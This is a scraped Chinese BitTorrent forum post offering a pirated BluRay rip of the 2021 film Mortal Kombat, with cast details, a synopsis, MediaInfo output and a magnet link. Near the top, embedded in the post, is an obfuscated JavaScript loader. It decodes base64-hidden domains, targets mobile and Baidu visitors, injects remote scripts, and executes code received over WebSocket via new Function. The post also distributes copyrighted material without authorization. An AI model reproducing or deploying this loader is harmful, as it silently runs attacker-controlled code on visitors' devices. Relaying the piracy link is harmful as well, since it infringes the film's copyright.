真人快打[双语字幕]Mortal.Kombat.2021.1080p.BluRay.TrueHD.7.1.Atmos.x265-10bit-迅雷下载 8.80GB

版主小s 20天前 262

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 真人快打/MK3: Domination/Mortal Kombat 3/Mortal Kombat: Devastation/格斗之王/真人快打:毁灭

◎片 名 Mortal Kombat

◎年 代 2021

◎产 地 美国

◎类 别 动作 / 奇幻 / 冒险

◎语 言 英语,日语,汉语普通话

◎上映日期 2021-04-08(中国香港) / 2021-04-23(美国)

◎IMDb评分 6.2/10 from 118951 users

◎IMDb链接 https://www.imdb.com/title/tt0293429/

◎豆瓣评分 5.2/10 from 18333 users

◎豆瓣链接 https://movie.douban.com/subject/2131664/

◎片 长 110分钟

◎导 演 西蒙·麦奎德 Simon McQuoid

◎编 剧 格雷格·罗素 Greg Russo / 戴夫·卡拉汉姆 Dave Callaham / 奥伦·尤济尔 Oren Uziel / 埃德·布恩 Ed Boon / 约翰·托拜亚斯 John Tobias

◎主 演 刘易斯·陈 Lewis Tan

乔·塔斯利姆 Joe Taslim

真田广之 Hiroyuki Sanada

杰西卡·麦克娜美 Jessica McNamee

约什·劳森 Josh Lawson

麦卡德·布鲁克斯 Mehcad Brooks

林路迪 Ludi Lin

浅野忠信 Tadanobu Asano

黄经汉 Chin Han

麦克斯?黄 Max Huang

茜茜·斯特林格 Sisi Stringer

梅尔·贾森 Mel Jarnson

丹尼尔·尼尔森 Daniel Nelson

劳拉·布伦特 Laura Brent

马蒂尔达·金伯 Matilda Kimber

艾丽莎·卡德维尔 Elissa Cadwell

内森·琼斯 Nathan Jones

克里斯·麦奎德 Kris McQuade

大卫·菲尔德 David Field

◎标 签 动作 | 游戏改编 | 美国 | 暴力 | 血腥 | 2021 | 奇幻 | 冒险

◎简 介

科尔(刘易斯·陈 Lewis Tan 饰)是一名身手非常矫健,但生活十分落魄的拳手,某日,他莫名其妙的遭到了冷冻术士绝对零度(乔·塔斯利姆 Joe Taslim 饰)的追杀。在特种部队少校贾克斯(麦卡德·布鲁克斯 Mehcad Brooks 饰)的帮助之下,科尔死里逃生,并且启程开始寻找一位叫做索尼娅(杰西卡·麦克娜美 Jessica McNamee 饰)的女子。

之后,科尔来到了地球阳间守护者雷电(浅野忠信 饰)的神庙之中,在这里,他遇见了战士刘康(林路迪 饰)和佣兵卡诺(约什·劳森 Josh Lawson 饰)等人,他们唯一的共同点就是身上都有着神秘的龙形标志。一行人即将在这里接受非常严酷的训练,以对抗来自异星敌人的侵略,保护宇宙的和平。

  1. General

  2. Unique ID : 197632783536643538932489178204608794146 (0x94AEB0885A60B9C8A1E150BA64E20E22)

  3. Complete name : Mortal.Kombat.2021.1080p.BluRay.TrueHD.7.1.Atmos.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.79 GiB

  7. Duration : 1 h 50 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 11.4 Mb/s

  10. Movie name : Mortal Kombat 2021 1080p BluRay TrueHD 7.1 Atmos x265-10bit-HDS

  11. Encoded date : UTC 2021-07-05 09:25:56

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 50 min

  21. Bit rate : 7 865 kb/s

  22. Width : 1 920 pixels

  23. Height : 804 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.212

  31. Stream size : 6.05 GiB (69%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Encoding settings : de / tmvp / b-intra / lslices=4 / deblock(tC=-1:B=-1)

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. Format : MLP FBA 16-ch

  40. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  41. Commercial name : Dolby TrueHD with Dolby Atmos

  42. Codec ID : A_TRUEHD

  43. Duration : 1 h 50 min

  44. Bit rate mode : Variable

  45. Bit rate : 3 449 kb/s

  46. Maximum bit rate : 5 781 kb/s

  47. Channel(s) : 8 channels

  48. Channel layout : L R C LFE Ls Rs Lb Rb

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 1 200.000 FPS (40 SPF)

  51. Compression mode : Lossless

  52. Stream size : 2.65 GiB (30%)

  53. Title : English

  54. Language : English

  55. Default : Yes

  56. Forced : No

  57. Number of dynamic objects : 11

  58. Bed channel count : 1 channel

  59. Bed channel configuration : LFE


  60. Text #1

  61. ID : 3

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 41 min

  67. Bit rate : 28.4 kb/s

  68. Count of elements : 2740

  69. Stream size : 20.6 MiB (0%)

  70. Title : ENG

  71. Language : English

  72. Default : Yes

  73. Forced : No


  74. Text #2

  75. ID : 4

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 37 min

  81. Bit rate : 19.3 kb/s

  82. Count of elements : 1416

  83. Stream size : 13.5 MiB (0%)

  84. Title : CHS

  85. Language : Chinese

  86. Default : No

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 37 min

  95. Bit rate : 19.9 kb/s

  96. Count of elements : 1416

  97. Stream size : 13.9 MiB (0%)

  98. Title : CHT

  99. Language : Chinese

  100. Default : No

  101. Forced : No


  102. Text #4

  103. ID : 6

  104. Format : PGS

  105. Muxing mode : zlib

  106. Codec ID : S_HDMV/PGS

  107. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration : 1 h 37 min

  109. Bit rate : 30.8 kb/s

  110. Count of elements : 1417

  111. Stream size : 21.5 MiB (0%)

  112. Title : CHS&ENG

  113. Language : Chinese

  114. Default : No

  115. Forced : No


  116. Text #5

  117. ID : 7

  118. Format : PGS

  119. Muxing mode : zlib

  120. Codec ID : S_HDMV/PGS

  121. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  122. Duration : 1 h 37 min

  123. Bit rate : 31.4 kb/s

  124. Count of elements : 1417

  125. Stream size : 21.9 MiB (0%)

  126. Title : CHT&ENG

  127. Language : Chinese

  128. Default : No

  129. Forced : No


  130. Menu

  131. 00:00:00.000 : en:Chapter 01

  132. 00:02:34.863 : en:Chapter 02

  133. 00:07:25.403 : en:Chapter 03

  134. 00:12:53.773 : en:Chapter 04

  135. 00:19:13.569 : en:Chapter 05

  136. 00:27:24.893 : en:Chapter 06

  137. 00:34:47.669 : en:Chapter 07

  138. 00:42:14.073 : en:Chapter 08

  139. 00:47:39.607 : en:Chapter 09

  140. 00:56:39.605 : en:Chapter 10

  141. 01:05:49.571 : en:Chapter 11

  142. 01:13:04.213 : en:Chapter 12

  143. 01:19:23.258 : en:Chapter 13

  144. 01:27:17.774 : en:Chapter 14

  145. 01:35:45.031 : en:Chapter 15

  146. 01:38:58.933 : en:Chapter 16


TAGS 动作 奇幻 冒险

磁力链:
  • magnet:?xt=urn:btih:5AD85401D895E42D9B115A9F083613D367C97A3E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回